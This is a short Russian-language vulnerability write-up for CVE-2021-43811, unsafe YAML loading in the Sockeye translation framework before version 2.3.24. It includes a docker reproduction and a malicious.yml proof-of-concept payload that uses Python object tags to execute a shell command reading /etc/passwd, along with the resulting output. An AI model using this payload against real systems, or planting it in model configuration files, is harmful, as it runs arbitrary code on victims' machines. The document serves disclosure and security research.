
awslabs/sockeye Внедрение кода через небезопасную загрузку YAML CVE-2021-43811
awslabs/sockeye Внедрение кода через небезопасную загрузку YAML CVE-2021-43811
Sockeye — это фреймворк с открытым исходным кодом для нейронного машинного перевода типа "последовательность-в-последовательность", построенный на PyTorch. Sockeye использует YAML для хранения конфигураций моделей и данных на диске. Версии ниже 2.3.24 используют небезопасную загрузку YAML, которая может быть использована для выполнения произвольного кода, встроенного в файлы конфигурации. Злоумышленник может добавить вредоносный код в файл конфигурации обученной модели и попытаться убедить пользователей скачать и запустить его. Если пользователи запускают модель, встроенный код выполняется локально. Проблема исправлена в версии 2.3.24.

docker build -t cve-2021-43811 .
docker run -it --rm cve-2021-43811
вывод /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"